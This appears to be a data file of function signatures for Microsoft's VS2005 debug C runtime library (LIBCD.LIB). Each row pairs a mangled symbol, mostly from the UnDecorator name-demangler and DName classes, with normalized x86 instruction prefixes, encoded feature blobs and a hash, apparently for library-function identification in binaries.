+_fgetws,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",cgYNJORSvJ+S9NEBCvAfvnS9/QiDrkNenIZROORSvJ+S9NEBkvTRAeRSvJ91gwavg65DXl6jgyf0Ke4I9CnuCLs9SYUAAAAAXqODJ4xqh0wAAAAAdL39CF6jgydeo4Mn5FK8n5yGUTichlE4nIZROORSvJ+S9NEBkvTRAeRSvJ91gwavdYMGr5yGUTichlE4XqODJ4xqh0wAAAAAXqODJ9TZ7ssAAAAAjGqHTAAAAAAAAAAAdYMGr5yGUTichlE45FK8n5yGUTichlE4uz1JhQAAAAAAAAAAxKDSCQAAAAAAAAAAnIZROJ0cG6sNzMABDczAAcSg0gkAAAAAnRwbq4xqh0wK8B++1Nnuy4xqh0wK8B++,[],21477b819738505e362e16370f6d940c2d6934c9,VS2005,LIBCD.LIB
+__longjmpex,"PUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,0\nJCC CONST",NRZyE7qgXgQAAAAAu7ZcLOmQYbyMl096TXXeoumQYbwAAAAAjJdPev8IKWK06Chh/wgpYgAAAAAAAAAAtOgoYf8IKWIuVbn+6ZBhvAAAAAAAAAAA6oXPG+mQYbyMl096LlW5/umQYbxNdd6iuqBeBLu2XCzqhc8b,[],51b817b0768fa1b5b042a7adbe9549a7e38a951a,VS2005,LIBCD.LIB
+??YDName@@QAEAAV0@PAV0@@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",MX02AAAAAAAAAAAALoz+dV6jgycAAAAA8w4X5TF9NgAAAAAAGifUTL8T/3rezKjMnwqMSxon1EyjH70aY28KkV6jgycAAAAAnwqMS58KjEvzDhflXqODJzF9NgAAAAAA3pMtFzF9NgAAAAAAvxP/emNvCpEujP51XqODJ4OuQ14AAAAAg65DXl6jgycAAAAAox+9Gt6TLRcaJ9RMincMmGNvCpEujP51li5ZUTF9NgCfCoxL3syozIp3DJgAAAAA,[],01af36e5139bec90137df74ce68ca730ced1edc4,VS2005,LIBCD.LIB
+??_5DName@@QAEAAV0@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nCMP CONST2,CONST\nJCC CONST",nwqMSzF9NgC+b0bJfERtBzF9NgCfCoxLvm9GyTF9NgAAAAAAMX02AAAAAAAAAAAA,[],24b5925d1d8e13755b9b161cbd07335f3ff5b16b,VS2005,LIBCD.LIB
+?getOperatorName@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],0",LkXksk+LzAoAAAAAXwnt+S5F5LJx/sHoT4vMCgAAAAAAAAAAcf7B6AAAAAAAAAAA,[],09b481afd0d5fab54399a4466a0adcbc6411397b,VS2005,LIBCD.LIB
+?doAccessSpecifiers@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",DfI/3wAAAAAAAAAA,[],959617e96d2d3a9de9347a624224b49167cecbd3,VS2005,LIBCD.LIB
+?getZName@UnDecorator@@CA?AVDName@@XZ,"LEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",nIZROG3Xy5Mj+OPZXqODJ88cQL4AAAAAbjtK1kOSIcbsxlAZLT1UbG3Xy5OchlE4T4vMCgAAAAAAAAAAgUgTJl6jgycAAAAA7MZQGU+LzAoAAAAAI/jj2U+LzAoAAAAAbdfLk247StaBSBMmQ5Ihxk+LzAoAAAAAzxxAvkOSIcbsxlAZ,[],d470c1ba22342c468bddb6cd359c82852c7863a4,VS2005,LIBCD.LIB
+?length@charNode@@UBEHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",n7hPQgAAAAAAAAAA,[],8a01746ef4ef5d472092b38a271d1fe9a7d131ea,VS2005,LIBCD.LIB
+___unDName,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",VaatKNZHfXINzMABT4vMCgAAAAAAAAAADczAAU+LzAoAAAAA1kd9ck+LzAoAAAAA,[],e1cd0b31fdd5da3af301b881abb5525bb9bc851c,VS2005,LIBCD.LIB
+?getString@charNode@@UBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",+FwoSwAAAAAAAAAAMX02AAAAAAAAAAAAYjkKYjF9NgAAAAAAvRhHkvhcKEuchlE4nIZROPhcKEtiOQpi,[],161630f5d9c47add42485b04bc0fa5adde9bd3b1,VS2005,LIBCD.LIB
+?getDataType@UnDecorator@@CA?AVDName@@PAV2@@Z,"MOV R32,DWORD PTR DS:[0]\nADD R32,CONST\nMOV DWORD PTR DS:[0],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",NRZyE6YgoPMAAAAAoGugR0+LzAoAAAAAaxBnWk+LzAoAAAAAj9UM5vfwPBSga6BHT4vMCgAAAAAAAAAAEturkmsQZ1rSRCIqpiCg80+LzAoAAAAA0kQiKiE4I9knD3US9/A8FE+LzAoAAAAAJw91Eo/VDOY1FnITITgj2U+LzAoAAAAA,[],c72fe0178acf49402eeeae96e77d76e23d57e80b,VS2005,LIBCD.LIB
+??4DName@@QAEAAV0@W4DNameStatus@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",hsKS3jUWchMAAAAAWynOITF9NgAAAAAAnIZROJ8KjEvfDv2fVlTqIjF9NgCok9z2lnPwXxcwS5cAAAAA3w79nzUWchOGwpLeFzBLlzF9NgBbKc4hMX02AAAAAAAAAAAAqJPc9pZz8F/ezKjMY2UOad8O/Z+chlE4NRZyEzF9NgAAAAAA3syozBcwS5cAAAAAnwqMS6iT3PZWVOoi,[],0671b6782fadae685347fb94a8b465a85f663748,VS2005,LIBCD.LIB
+??0DNameNode@@IAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32+CONST],0",5Ihl/QAAAAAAAAAA,[],8e0be4a0e5c8079887598990c1019dd4cf0262f3,VS2005,LIBCD.LIB
+?length@DNameStatusNode@@UBEHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV ESP,EBP\nPOP EBP",JrAphQAAAAAAAAAA,[],33c6fba87cc1842ff3861726589ea552de099bc3,VS2005,LIBCD.LIB
+??HDName@@QBE?AV0@D@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",QzFjIRsgNUwAAAAABGBHC0MxYyEcXupcHF7qXBsgNUwAAAAAGyA1TAAAAAAAAAAA,[],f42e3a374f40bff82af6156207ee44e2750a3cab,VS2005,LIBCD.LIB
+?getMemory@HeapManager@@QAEPAXIH@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",dG1Z9L8T/3rM2gTfGT3Rg0FT69eLDRRMXqODJ+Vv5zMAAAAAgP0ifgAAAAAAAAAAQVPr1+Vv5zMAAAAABle47iVLwKkAAAAACtJmX5yGUTh+if6tvxP/eg3MwAEp2auwJUvAqV6jgycAAAAAzNoE34p3DJgAAAAAiw0UTHRtWfRmeTE1incMmA3MwAEp2auw5W/nM4D9In4AAAAAnIZROBk90YOWc/Bffon+rYD9In4AAAAAZnkxNYD9In4AAAAAlnPwXxk90YMAAAAATuJtWyVLwKkAAAAAKdmrsE7ibVsGV7juDczAAYD9In4AAAAA,[],818736abe56b06ac67e86acc4580fb3daeb37991,VS2005,LIBCD.LIB
+?doNameOnly@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nPOP EBP\nRETN",IFDWgQAAAAAAAAAA,[],e6077b3ee93b5e380ef97e7137d8e85647552227,VS2005,LIBCD.LIB
+?getDataIndirectType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH R32\nPUSH CONST",FsRirgAAAAAAAAAA,iSUqXQAAAAAAAAAA,115602f38d10193679dca78944fe6c483bc6e88c,VS2005,LIBCD.LIB
+?doMemberTypes@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",DfI/3wAAAAAAAAAA,[],f352fa4b5b2d37ef644a802b427e200fb72d99c6,VS2005,LIBCD.LIB
+?getBasicDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND CONST,CONST\nTEST R32,R32\nJCC CONST",XqODJ0XeeBUAAAAAwZugLgAAAAAAAAAADpXpTEXeeBWgcnitIcIplk+LzAoAAAAAc/C1MZ8KjEvBm6AuVwiNGE+LzAoAAAAAnwqMS1cIjRghwimWoHJ4rUXeeBUAAAAADpXpTA6V6UyuWlvrUAYO4PDXdy/Bm6Au8Nd3L2nNBgBXCI0Y2qM7dEXeeBUOlelMoHJ4rV6jgycAAAAAwZugLgAAAAAAAAAARd54FU+LzAoAAAAA79gQG6AG8q5QBg7gT4vMCgAAAAAAAAAAac0GANqjO3Rz8LUxoAbyrk+LzAoAAAAArlpb616jgyegcnitVwiNGE+LzAoAAAAA,[],62a3599de874e6755e935f965c7fd43efbec0f6b,VS2005,LIBCD.LIB
+?doEcsu@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",DfI/3wAAAAAAAAAA,[],d7e437623b754ad8bdf04cb94df91e00d7ec35f5,VS2005,LIBCD.LIB
+?getDimension@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",sqx0aY/Um21F8BWG9GaGcI/Um20AAAAALLBVVfRmhnAAAAAAj9SbbfAijlyyrHRpRfAVhk+LzAoAAAAAj9SbbcjjyjvBDajYLkXksk+LzAoAAAAAyOPKO/AijlyyrHRpj9SbbS5F5LIssFVVT4vMCgAAAAAAAAAARfAVhk+LzAoAAAAALkXksk+LzAoAAAAA8CKOXIddte0uReSyGpNHI4/Um21F8BWGj9SbbcjjyjuP1JttwQ2o2E+LzAoAAAAAj9SbbS5F5LKP1Jtth1217U+LzAoAAAAA,[],0e0da0ac62d3c4145fc0f84f7df58738f0d20c14,VS2005,LIBCD.LIB
+?haveTemplateParameters@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nPOP EBP\nRETN",IFDWgQAAAAAAAAAA,[],31c0046471a70656cafec02f3aa46b1cbaaed3de,VS2005,LIBCD.LIB
+?getPrimaryDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV DWORD PTR SS:[EBP+CONST],R32",pe15ME+LzAoAAAAAwZugLgAAAAAAAAAAT4vMCgAAAAAAAAAADJPOyaXteTDBm6Au,[],a9aad2230634e3ef70e5dcc519c08c9646d5658d,VS2005,LIBCD.LIB
+??0UnDecorator@@QAE@PADPBDHP6APADJ@ZK@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST",lKWD+wAAAAAAAAAA,yHFPmAAAAAAAAAAA,27d25a36c5737694f3533c6f07b5132eb602bdcc,VS2005,LIBCD.LIB
+?getStorageConvention@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",wRGZPgAAAAAAAAAA,FsRirgAAAAAAAAAA,22bad61ddf6c6e2c3eca362db4f9488a80af175a,VS2005,LIBCD.LIB
+?UScore@UnDecorator@@SAPBDW4Tokens@@@Z,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nTEST R32,R32\nJCC CONST",AOHWawAAAAAAAAAAWn1BPsO8a4u5vHHwubxx8ADh1msAAAAAw7xriwDh1msAAAAA,[],8b22a30de6f34de6dd2893f3d812e88143b6839b,VS2005,LIBCD.LIB
+??4DName@@QAEAAV0@PAV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",XqODJzF9NgAAAAAAJrgSADF9NgAAAAAAox+9GjF9NgBpzQYA3syozBcwS5cAAAAAMX02AAAAAAAAAAAAWynOIV6jgycAAAAAtRoLbmnNBgCjH70aac0GACa4EgDZYd+NlnPwXxcwS5cAAAAAFzBLl16jgydbKc4h2WHfjZZz8F/ezKjM,[],47b63a7ac28335ae01a58739ff435aa7654a690d,VS2005,LIBCD.LIB
+??4DName@@QAEAAV0@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",ox+9GjF9NgA94elyPeHpcjF9NgAAAAAAMX02AAAAAAAAAAAAyFLlrz3h6XKjH70a,[],67d470215d5c85b9e26204bbdad1009f42b7096f,VS2005,LIBCD.LIB
+??0Replicator@@QAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nCALL CONST",yHFPmAAAAAAAAAAA,3syozK0czcsAAAAA9CnuCIi3OOoAAAAAMX02AAAAAAAAAAAA+Hf5wYi3OOoAAAAAY2UOafh3+cGchlE4iLc46pZz8F/ezKjMlnPwX60czcsAAAAAWynOITF9NgAAAAAArRzNyzF9NgBbKc4hnIZROPh3+cH0Ke4I,6f140e4b28bada4a6a97a3d4546274ac930a7c68,VS2005,LIBCD.LIB
+?getECSUName@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",wRGZPgAAAAAAAAAA,UDQ4vMihsj0PRajzsqx0aVA0OLwPRajze/ISAHvyEgCvcIvUe/ISALKsdGn0ZoZwD0Wo817WI20AAAAAqSCPCXvyEgBGiv0ED0Wo817WI20AAAAAr3CL1LKsdGn0ZoZw9GaGcF7WI20AAAAAyKGyPV7WI20AAAAARor9BHvyEgB78hIAXtYjbQAAAAAAAAAA,b4d6c78196b58cbe5429c7fdd5f3362168e7eed3,VS2005,LIBCD.LIB
+?doAllocationModel@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",N1mO7AAAAAAAAAAA,[],aff8f89e1c49f590e6211e93498afd050215dc6c,VS2005,LIBCD.LIB
+?doUnderScore@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",N1mO7AAAAAAAAAAA,[],07061e4629e6e9a88ae2538f87dd23d945caf500,VS2005,LIBCD.LIB
+?setPtrRef@DName@@QAEAAV1@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nOR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",QcdNGQAAAAAAAAAA,[],b011fff9c7c3b45553fe8ce4da73815375ba2867,VS2005,LIBCD.LIB
+??0DName@@QAE@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nSHL R32,CONST\nSAR R32,CONST",UnBgjwAAAAAAAAAA,[],59db1c29aeab7122be52507ebe9376f7a3145e39,VS2005,LIBCD.LIB
+??4DName@@QAEAAV0@D@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",eEueoQAAAAAAAAAA,GifUTIRhyQJTSKWliQ86P4D9In6jH70ahGHJAl6jgycAAAAAFzBLl16jgycAAAAAU0ilpRcwS5cAAAAAox+9GoD9In6DrkNeg65DXmnNBgBxMROchGHJAl6jgycAAAAAXqODJ4D9In4AAAAAFfMm4AAAAAAAAAAAcTETnID9In4AAAAAac0GABXzJuBpzQYAgP0ifgAAAAAAAAAAac0GABXzJuCKdwyYXqODJ16jgycAAAAAincMmDLMWuSchlE4GifUTIRhyQKXCllFFzBLl16jgycAAAAAnIZROBon1Exeo4MnXqODJxon1EwAAAAAMsxa5F6jgycAAAAAlwpZRRcwS5cAAAAA,ccf63e538178e39e221bb01ef32f05445ce61be9,VS2005,LIBCD.LIB
+??0DName@@QAE@K@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R32,CONST\nDIV R32\nADD R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",mh4fBJoeHwQunbKm2wANEpoeHwQunbKmLp2ypgAAAAAAAAAA,[],ed9da4da76ed648f9fb8819a2a8f15dd52470c82,VS2005,LIBCD.LIB
+?getScope@UnDecorator@@CA?AVDName@@XZ,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN",XqODJ4SvMcsAAAAAUDQ4vGq+4dgPRajzep/MVTKWMVZQNDi8D0Wo816jgycAAAAAUDQ4vI65RTjCQiGUar7h2F7WI20AAAAAkoZBSzUWchMAAAAAXqODJzUWchMAAAAACA2r06V/b4QAAAAAcf7B6AAAAAAAAAAAwkIhlI65RTgq9+FXKvfhVwgNq9PDlRfy2fpflTKWMVZH5yNRpX9vhDKWMVZH5yNRXqODJ17WI20AAAAAXqODJ17WI20AAAAAhK8xywAAAAAAAAAANRZyE6V/b4QAAAAAMpYxVlA0OLxclgqBXtYjbQAAAAAAAAAAjrlFOAgNq9PDlRfyUmjqW5KGQUsDArnOR+cjUTKWMVZ6n8xVXJYKgV6jgydeo4MnAwK5zl6jgycAAAAAw5UX8lJo6ltx/sHo,[],57653dbd0140e80fba649ce877ac5d7379cccbde,VS2005,LIBCD.LIB
+?isEmpty@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32],0\nJCC CONST",pPbKrJZz8F+fCoxLnwqMS5Zz8F/0Ke4I1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAA9CnuCNUc1LYAAAAA,[],4b91f700ff762e0c64e195ac13fded24994765a5,VS2005,LIBCD.LIB
+??0DName@@QAE@PBD@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",j9755zF9NgAAAAAAMX02AAAAAAAAAAAAIXdy1TF9NgCP3vnn,[],a7438b6abae2700583febc93c81b544518d55eab,VS2005,LIBCD.LIB
+??2@YAPAXIAAVHeapManager@@H@Z,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,0\nCALL CONST",v5UHvwAAAAAAAAAA,incMmA3MwAEp2auw5W/nM4D9In4AAAAAnIZROBk90YOWc/Bffon+rYD9In4AAAAAZnkxNYD9In4AAAAAzNoE34p3DJgAAAAATuJtWyVLwKkAAAAAKdmrsE7ibVsGV7juDczAAYD9In4AAAAAdG1Z9JZz8F/M2gTfGT3Rg0FT69eLDRRMXqODJ+Vv5zMAAAAAgP0ifgAAAAAAAAAAQVPr1+Vv5zMAAAAABle47iVLwKkAAAAAlnPwXxk90YMAAAAACtJmX5yGUTh+if6tlnPwX4p3DJgAAAAAJUvAqV6jgycAAAAAiw0UTHRtWfRmeTE1,deca0a12d188af8c68f3c48ec33a0329b3d0bebc,VS2005,LIBCD.LIB
+??0pDNameNode@@QAE@PAVDName@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0",q8mD8vh3+cFWVOoi3xAKzgAAAAAAAAAAVlTqIvh3+cH0Ke4I9CnuCN8QCs4AAAAAVlTqIvQp7ghWVOoi+Hf5wd8QCs4AAAAA,[],4576ca3ad51ab14b3bb4bc8107e6db1e6de77dd4,VS2005,LIBCD.LIB
+??0DName@@QAE@D@Z,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",FmhznzF9NgBHWJVdMX02AAAAAAAAAAAAR1iVXTF9NgAAAAAA,[],d70af6b12839dcd2b49c6b147ffc6e3259b7e416,VS2005,LIBCD.LIB
+?getString@DNameStatusNode@@UBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",AXQ8cynZq7Bz/R9GKdmrsJZz8F+chlE4lnPwXzF9NgAAAAAAnIZROJZz8F+chlE4c/0fRinZq7AAAAAAnIZROJZz8F8nOOUdJzjlHTF9NgAAAAAAMX02AAAAAAAAAAAA,[],c1c1f3a33e9839e9f2b107d959b6b06db0144bc1,VS2005,LIBCD.LIB
+?getThrowTypes@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",2Ngtmk+LzAoAAAAAGpNHI9jYLZqP1JttGy8z4U+LzAoAAAAAvqHlME+LzAoAAAAAT4vMCgAAAAAAAAAAj9Sbbb6h5TAbLzPh,[],3183093f204e8dad09b8da43ca14ec4b80f13963,VS2005,LIBCD.LIB
+?Destructor@HeapManager@@QAEXXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",T4vMCgAAAAAAAAAA3stJ80+LzApUTW4155xsS0+LzArey0nzVE1uNd7LSfMAAAAA,[],f851eac0143cbfb4ae87dd46c77b0eae4c0a2f4f,VS2005,LIBCD.LIB
+?doFunctionReturns@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",N1mO7AAAAAAAAAAA,[],2e03ef8920280075381f749f2f140462267e5807,VS2005,LIBCD.LIB
+?getArrayType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",hxUUOcgpHsoAAAAAPkD3i0+LzAoAAAAAHaRN60+LzAoAAAAABoBvKH0JSDQAAAAAgh1dHE+LzAoAAAAAp67tjn0JSDQAAAAAT4vMCgAAAAAAAAAAeF2amJyGUTiWc/BffQlINJ8KjEsGgG8oES2tap8KjEt4XZqYnwqMS8gpHsqHFRQ5yCkeyk+LzAoAAAAAnwqMSz5A94sdpE3rlnPwX5yGUTgAAAAAnIZROKeu7Y6CHV0c,[],63ee324af8336e1c385b9905260cec64588c0a2b,VS2005,LIBCD.LIB
+?length@pDNameNode@@UBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",erDzW5Zz8F9R4vLv1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAAUeLy79Uc1LYAAAAA,[],a9e49d174e47a0d67dc557758aa0234031d0052f,VS2005,LIBCD.LIB
+??HDName@@QBE?AV0@PBD@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",GyA1TAAAAAAAAAAAESVRXAAAAAAAAAAABGBHCxElUVyNeqyKjXqsihsgNUwAAAAA,[],e0de8f880de5176e3f136a76807b444234e600ca,VS2005,LIBCD.LIB
+?getPtrRefType@UnDecorator@@CA?AVDName@@ABV2@0H@Z,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R8,R8\nAND R8,CONST\nADD R8,CONST",QvrI2U+LzAoAAAAAOnqIjk+LzAoAAAAAG75YnJ8KjEufCoxL79gQG6sKfyiP1JttnwqMS48BVbqfCoxLT4vMCgAAAAAAAAAAj9SbbRu+WJx78hIAnwqMS0OSIcafCoxLTkAe10+LzAoAAAAAyCkeyk+LzAoAAAAA7fGjvU+LzAoAAAAAqwp/KJ8KjEuPAVW6jwFVusgpHsrt8aO9nwqMS05AHtdC+sjZe/ISADp6iI4bvlicQ5Ihxk+LzAoAAAAAj9SbbXvyEgCP1JttnwqMS8gpHsrt8aO9jwFVukOSIcafCoxLnwqMS58KjEuPAVW6,[],3843799fe9bb8ec47061a4c8fa2100884fd0e021,VS2005,LIBCD.LIB
+?getCallingConvention@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",KbMKOzy9fCwhkrnzT4vMCgAAAAAAAAAALkXksk+LzAoAAAAABWKxlE+LzAoAAAAAPL18LE+LzAoAAAAAbbXOoS5F5LJpzQYAwZugLgAAAAAAAAAAIZK58zy9fCzBm6Auac0GAC5F5LIpswo779gQGwVisZRttc6h,[],171828f401728a459bbd6dab17c52041e65675f8,VS2005,LIBCD.LIB
